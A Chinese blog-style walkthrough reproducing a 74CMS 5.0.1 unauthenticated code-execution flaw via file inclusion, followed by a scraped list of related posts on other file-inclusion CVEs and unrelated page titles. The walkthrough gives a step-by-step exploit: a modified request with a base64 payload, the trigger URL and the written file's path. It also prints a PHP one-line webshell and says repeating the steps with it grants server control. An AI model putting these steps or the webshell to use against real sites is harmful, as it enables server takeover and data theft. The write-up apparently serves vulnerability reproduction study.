漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。

下载地址:

http://www.74cms.com/download/index.html

下载后解压到phpstudy的根目录www里面

输入网址,http://127.0.0.1/upload/install.php

一直点击下一步,输入数据库名称和密码

进入系统

抓个包看看

将包中的domain后面的改成如下

base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode

然后我们点击send进行发包,看到返回后status等于1,说明状态码正常,发包成功

接下来激活这个发包内容,payload:

127.0.0.1/upload/Application/Common/Conf/url.php

打开看看

发现1.php雀食被写进去了

接下来就是访问1.php了,payload;

127.0.0.1/upload/Application/Common/Conf/1.php

可以看到成功访问phpinfo,说明漏洞存在且被利用wo

我们这次用的是phpinfo,危害不大,如果我们使用一句话木马,就可以造成更大的危害

一句话木马:<?php @eval($_POST['zrtonnn']);?>

将木马用decode改成base64,重复上述操作,即可得到权限

74cms 5.0.1版本文件包含漏洞复现相关推荐

  1. index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

    CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...

  2. phpmyadminV4.8.1本地文件包含漏洞复现

    文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...

  3. CVE-2020-1938 Aapache Tomcat AJP文件包含漏洞复现

    目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用nmap扫描目标 2.运行POC验证漏洞 3.POC代码 三.修复方法 一.环境搭建 1.下载vulhub kali系统输 ...

  4. php文件包含漏洞复现,文件包含漏洞(绕过姿势)

    当你的才华 还撑不起的野心时 那你就应该静下心来学习 目录 文件包含漏洞介绍 特殊姿势 亲测有效 php文件包含漏洞 本地包含漏洞(LFI) 远程包含漏洞 文件包含利用 读取敏感信息 远程包含shel ...

  5. tomcat ajp协议安全限制绕过漏洞_Apache tomcat 文件包含漏洞复现(CVE20201938)

    漏洞背景 Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer ...

  6. phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现

    漏洞描述 ​ 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试. 攻击者必须经过身份验证 ...

  7. 【CVE-2018-12613】phpmyadmin 4.8.1 远程文件包含漏洞复现

    **环境:**http://62.234.56.138:8080/server_databases.php 官网下载phpmyadmin 4.8.1 源码:index.php文件中 函数含义: tar ...

  8. test.php.bak,记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)

    题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...

  9. 远程文件包含 php,php本地及远程文件包含漏洞

    在php程序中包含有file inclusion的时候,php要开启一下两个功能: allow_url_fopen on allow_url_include on 但是开启这两个功能之后伴随的是url ...

  10. index.php.bak 颓废_18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

    phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...

最新文章

  1. PyTorch代码调试利器: 自动print每行代码的Tensor信息
  2. mysql配置_Mysql配置 max_allowed_packet
  3. 什么是强人工智能,强人工智能的实现,需要具备哪些条件?
  4. 关于jenkins的安装及自动部署
  5. Css的filter常用濾波器屬性及語句大全
  6. 第三次小组赛解题报告
  7. Fibonacci Knapsack
  8. 工业级光纤收发器的选用方法
  9. PHP uniqid()函数可用于生成不重复的唯一标识符,该函数基于微秒级当前时间戳。在高并发或者间隔时长极短(如循环代码)的情况下,会出现大量重复数据。即使使用了第二个参数,也会重复,最好的方案是结
  10. css border 圆角气泡案例
  11. C程序设计案例(矩形法求定积分问题)
  12. select下拉复选
  13. 入手新吉他了--雅马哈F600
  14. DeDeCMS二次开发教程之程序安装
  15. 惊讶!一行Python代码让图形秒变「手绘风」
  16. 《投资中最简单的事》”第二部分--投资办法“读书笔记
  17. google迈向IoT的开端——推出Android Things操作系统
  18. 2021.02.17 GDKOI2021 好题记 第一记
  19. Java 引用变量和实体变量
  20. 卓海科技冲刺创业板:拟募资5.47亿 相宇阳控制52.9%股权

热门文章

  1. 正二十面体制作步骤介绍
  2. 什么是冒烟测试?什么是回归测试?
  3. 腾讯WiFi管家 v3.7.3
  4. 天正电气lisp是什么文件_教大家如何使用天正电气软件绘制图纸
  5. PHP爬虫常用技术:v8js(执行js代码)
  6. 《HybridSN: Exploring 3-D–2-DCNN Feature Hierarchy for Hyperspectral Image Classification》论文学习笔记
  7. C/C++实现atoll函数
  8. 教你查看网页的记住密码和免费下载付费音乐
  9. 2022泰迪杯B题思路解析(LSTM神经网络,时间序列ARIMA模型)可供学习参考
  10. 色彩设计原理(里面有配色方案,也有配色网站)